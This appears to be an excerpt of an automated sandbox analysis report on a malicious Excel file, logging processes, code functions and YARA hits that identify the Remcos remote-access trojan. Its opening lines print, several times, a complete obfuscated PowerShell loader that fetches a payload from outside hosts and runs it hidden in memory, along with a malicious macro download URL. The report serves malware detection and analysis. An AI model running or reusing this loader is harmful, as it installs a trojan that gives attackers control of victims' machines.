'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00401806 NtdllDefWindowProc_W,24_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004018C0 NtdllDefWindowProc_W,24_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004016FD NtdllDefWindowProc_A,25_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004017B7 NtdllDefWindowProc_A,25_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00402CAC NtdllDefWindowProc_A,26_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00402D66 NtdllDefWindowProc_A,26_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,31_2_004167EF
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE89A8085814_2_000007FE89A80858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1001719420_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1000B5C120_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044B04024_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0043610D24_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044731024_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044A49024_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040755A24_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0043C56024_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044B61024_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044D6C024_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004476F024_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044B87024_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044081D24_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041495724_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004079EE24_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00407AEB24_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044AA8024_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00412AA924_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00404B7424_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00404B0324_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044BBD824_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00404BE524_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00404C7624_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00415CFE24_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00416D7224_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00446D3024_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00446D8B24_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00406E8F24_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0040503825_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0041208C25_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004050A925_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0040511A25_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0043C13A25_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004051AB25_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044930025_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0040D32225_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044A4F025_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0043A5AB25_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0041363125_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044669025_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044A73025_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004398D825_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004498E025_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044A88625_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0043DA0925_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00438D5E25_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00449ED025_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0041FE8325_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00430F5425_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004050C226_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004014AB26_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040513326_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004051A426_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040124626_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040CA4626_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040523526_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004032C826_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040168926_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00402F6026_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043706A31_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041400531_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043E11C31_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004541D931_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004381E831_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041F18B31_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044627031_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043E34B31_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004533AB31_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042742E31_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043756631_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043E5A831_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004387F031_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043797E31_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004339D731_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044DA4931_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00427AD731_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041DBF331_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00427C4031_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00437DB331_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00435EEB31_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043DEED31_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00426E9F31_2_00426E9F
                  Source: 037002451082_10142024.xlsOLE indicator, VBA macros: true
                  Source: 037002451082_10142024.xlsStream path 'MBD002DCAA1/\x1Ole' : https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squide$nF5E(1Bi-1`U&d)K[BdAOlZk-Lxe]Lr|OAk7V{Q6KyiY.y<>$=UDK?!cRhnJ*.F`*)n}7)TrJGm$M-IO.:jlVytACKfTYbBZrQL0Bp44qA2qrUlecrlwiyeZVYVHVnljhQPIILCb03DeOQHHsZ7oqmwAbOtGcT4CWsCGhYSUTlEF637A6WirUpV40uQYHdBoxMC3SHJrA7H4N8RhzmC0L9OIQWCsbwBY348Oi5Agg5KAMC);c1?"nGc.%b
                  Source: 7D330000.0.drStream path 'MBD002DCAA1/\x1Ole' : https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squide$nF5E(1Bi-1`U&d)K[BdAOlZk-Lxe]Lr|OAk7V{Q6KyiY.y<>$=UDK?!cRhnJ*.F`*)n}7)TrJGm$M-IO.:jlVytACKfTYbBZrQL0Bp44qA2qrUlecrlwiyeZVYVHVnljhQPIILCb03DeOQHHsZ7oqmwAbOtGcT4CWsCGhYSUTlEF637A6WirUpV40uQYHdBoxMC3SHJrA7H4N8RhzmC0L9OIQWCsbwBY348Oi5Agg5KAMC);c1?"nGc.%b
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
